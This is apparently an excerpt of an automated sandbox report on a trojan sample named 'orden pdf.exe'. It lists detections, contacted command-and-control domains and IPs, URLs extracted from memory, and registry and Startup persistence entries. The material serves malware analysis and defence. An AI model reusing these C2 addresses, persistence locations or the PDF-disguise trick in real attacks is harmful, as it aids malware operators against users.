          C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe33%ReversingLabsWin32.Trojan.Fuerboos
          C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe33%ReversingLabsWin32.Trojan.Fuerboos
          C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe33%ReversingLabsWin32.Trojan.Fuerboos

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.orden pdf.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.orden pdf.exe.39e0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.huro14.com0%Avira URL Cloudsafe
          http://www.allworljob.com/n7ak/0%Avira URL Cloudsafe
          http://www.hydrabadproperties.com0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.com0%Avira URL Cloudsafe
          http://www.myultimateleadgenerator.com/n7ak/www.manfast.online0%Avira URL Cloudsafe
          http://www.s-immotanger.com/n7ak/www.joomlas123.info0%Avira URL Cloudsafe
          http://www.allworljob.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.librosdecienciaficcion.com0%Avira URL Cloudsafe
          http://www.excelcapfunding.com0%Avira URL Cloudsafe
          http://www.s-immotanger.com0%Avira URL Cloudsafe
          http://www.office4u.info/n7ak/www.hanaleedossmann.com0%Avira URL Cloudsafe
          http://www.hanaleedossmann.com0%Avira URL Cloudsafe
          http://www.s-immotanger.com/n7ak/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.joomlas123.info/n7ak/www.office4u.info0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.unbelievabowboutique.com/n7ak/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.hanaleedossmann.com/n7ak/www.librosdecienciaficcion.com0%Avira URL Cloudsafe
          http://www.manfast.online/n7ak/0%Avira URL Cloudsafe
          http://www.office4u.infoReferer:0%Avira URL Cloudsafe
          http://www.myultimateleadgenerator.com/n7ak/0%Avira URL Cloudsafe
          http://www.wwwswty6655.com/n7ak/0%Avira URL Cloudsafe
          http://www.hanaleedossmann.comReferer:0%Avira URL Cloudsafe
          http://www.joomlas123.info0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.healthywithhook.com/n7ak/0%Avira URL Cloudsafe
          http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.com0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.excelcapfunding.comReferer:0%Avira URL Cloudsafe
          http://www.allworljob.comReferer:0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ultimatewindowusa.com/n7ak/0%Avira URL Cloudsafe
          http://www.unbelievabowboutique.com0%Avira URL Cloudsafe
          http://www.healthywithhook.com/n7ak/www.s-immotanger.com0%Avira URL Cloudsafe
          http://www.unbelievabowboutique.comReferer:0%Avira URL Cloudsafe
          http://www.hydrabadproperties.com/n7ak/0%Avira URL Cloudsafe
          http://www.huro14.com/n7ak/0%Avira URL Cloudsafe
          http://www.bepbosch.com/n7ak/0%Avira URL Cloudsafe
          http://www.huro14.comReferer:0%Avira URL Cloudsafe
          http://www.joomlas123.info/n7ak/0%Avira URL Cloudsafe
          http://www.unbelievabowboutique.com/n7ak/www.bepbosch.com0%Avira URL Cloudsafe
          http://www.excelcapfunding.com/n7ak/0%Avira URL Cloudsafe
          http://www.librosdecienciaficcion.com/n7ak/0%Avira URL Cloudsafe
          http://www.s-immotanger.comReferer:0%Avira URL Cloudsafe
          http://www.excelcapfunding.com/n7ak/www.allworljob.com0%Avira URL Cloudsafe
          http://www.myultimateleadgenerator.com0%Avira URL Cloudsafe
          http://www.wwwswty6655.com0%Avira URL Cloudsafe
          http://www.bepbosch.com/n7ak/www.huro14.com0%Avira URL Cloudsafe
          http://www.office4u.info0%Avira URL Cloudsafe
          http://www.wwwswty6655.comReferer:0%Avira URL Cloudsafe
          http://www.bepbosch.comReferer:0%Avira URL Cloudsafe
          http://www.librosdecienciaficcion.com/n7ak/MicrM0%Avira URL Cloudsafe
          http://www.manfast.onlineReferer:0%Avira URL Cloudsafe
          http://www.allworljob.com/n7ak/www.healthywithhook.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.joomlas123.infoReferer:0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.librosdecienciaficcion.comReferer:0%Avira URL Cloudsafe
          http://www.office4u.info/n7ak/0%Avira URL Cloudsafe
          http://www.bepbosch.com0%Avira URL Cloudsafe
          http://www.healthywithhook.com0%Avira URL Cloudsafe
          http://www.ultimatewindowusa.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          unbelievabowboutique.com
          		34.102.136.180
          		truetrue
            		unknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            		3.223.115.185
            		truefalse
              		high
              www.hydrabadproperties.com
              		91.195.240.94
              		truetrue
                		unknown
                www.wwwswty6655.com
                		unknown
                		unknowntrue
                  		unknown
                  www.huro14.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.bepbosch.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.unbelievabowboutique.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.hydrabadproperties.com/n7ak/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.bepbosch.com/n7ak/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.huro14.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.allworljob.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.hydrabadproperties.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.myultimateleadgenerator.com/n7ak/www.manfast.onlineexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.s-immotanger.com/n7ak/www.joomlas123.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.allworljob.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.goodfont.co.krexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.librosdecienciaficcion.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.excelcapfunding.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.s-immotanger.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.office4u.info/n7ak/www.hanaleedossmann.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hanaleedossmann.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.s-immotanger.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.joomlas123.info/n7ak/www.office4u.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.typography.netDexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.unbelievabowboutique.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.hanaleedossmann.com/n7ak/www.librosdecienciaficcion.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.manfast.online/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.office4u.infoReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.myultimateleadgenerator.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wwwswty6655.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hanaleedossmann.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.joomlas123.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.healthywithhook.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fonts.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.excelcapfunding.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.allworljob.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sakkal.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.ultimatewindowusa.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.unbelievabowboutique.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.healthywithhook.com/n7ak/www.s-immotanger.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.unbelievabowboutique.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.huro14.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.huro14.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.joomlas123.info/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.unbelievabowboutique.com/n7ak/www.bepbosch.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.excelcapfunding.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.librosdecienciaficcion.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.s-immotanger.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.excelcapfunding.com/n7ak/www.allworljob.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.myultimateleadgenerator.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wwwswty6655.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.bepbosch.com/n7ak/www.huro14.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.office4u.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wwwswty6655.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.bepbosch.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.librosdecienciaficcion.com/n7ak/MicrMexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.manfast.onlineReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.allworljob.com/n7ak/www.healthywithhook.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.joomlas123.infoReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.librosdecienciaficcion.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.office4u.info/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bepbosch.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.healthywithhook.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ultimatewindowusa.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.hanaleedossmann.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.healthywithhook.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hydrabadproperties.com/n7ak/www.myultimateleadgenerator.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.huro14.com/n7ak/www.wwwswty6655.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.myultimateleadgenerator.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.manfast.onlineexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.manfast.online/n7ak/www.ultimatewindowusa.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ultimatewindowusa.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hydrabadproperties.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            91.195.240.94
                                            		unknownGermany
                                            		47846SEDO-ASDEtrue
                                            34.102.136.180
                                            		unknownUnited States
                                            		15169GOOGLEUStrue
                                            3.223.115.185
                                            		unknownUnited States
                                            		14618AMAZON-AESUSfalse

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:339334
                                            Start date:13.01.2021
                                            Start time:21:10:24
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 14m 3s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:orden pdf.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:34
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@217/11@9/3
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 69.3% (good quality ratio 64.2%)
                                            • Quality average: 71.1%
                                            • Quality standard deviation: 31%
                                            HCA Information:
                                            • Successful, ratio: 52%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.104.144.132, 13.88.21.125, 13.64.90.137, 104.43.139.144, 51.103.5.159, 20.54.26.129, 92.122.213.194, 92.122.213.247, 104.42.151.234, 51.11.168.160, 52.155.217.156
                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            21:11:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
                                            21:12:45AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run M4MLMFWXCHC C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            91.195.240.94RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.docGet hashmaliciousBrowse
                                            • www.ghelyoun.net/iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ==
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • www.atypicaldesigncollective.com/wpsb/?Wxo=7nVneewqAZB/aftRijb2AYl2HcKbMlcArpJ1Vm/P20XaJXjQGY4QEDBLruT4Dk62NMvB&vB=lhv8
                                            Consignment Details.exeGet hashmaliciousBrowse
                                            • www.covicio.com/h3qo/?XvLhT=L8rdGtX8cj&K8b4v=OddLokl31qshFyWlyQEIcVDu0pAizKjoKxsWslvKSNLFFj/yIE9+GRG/HaxRm8+xLwnE
                                            Purchase Order -263.exeGet hashmaliciousBrowse
                                            • www.findmafia.com/n925/?jzuPNj=xuK0umGZqRSssiyTWB5PD2gV4XB3nq++hz/B9PiFwF5vik7/dd9PhqS/Ff7Fsejy2lMX&8p=_jAPiL
                                            Pending PURCHASE ORDER - 47001516.pdf.exeGet hashmaliciousBrowse
                                            • www.areralind.com/iic6/?u4ThA=cjlh2bLhQXW4VlC&MZQL=DoV7cEYQMmd7VxVpFw3yWAvm+e4DwTKM6ez4HiOjEpQ1Fk/Pb5v3dzoCBKvMyVMsONTa
                                            order no. 3643.exeGet hashmaliciousBrowse
                                            • www.promotionalplacements.com/0wdn/?Bl=jmYaOKlr+2FfAeZahyaTAMJRjN0ako2uRB7ye7tFiJ41vzJNH4E+JCCo9bj1vuPP2YbX&QzuP3V=KfvDIX0H
                                            Details!!!!.exeGet hashmaliciousBrowse
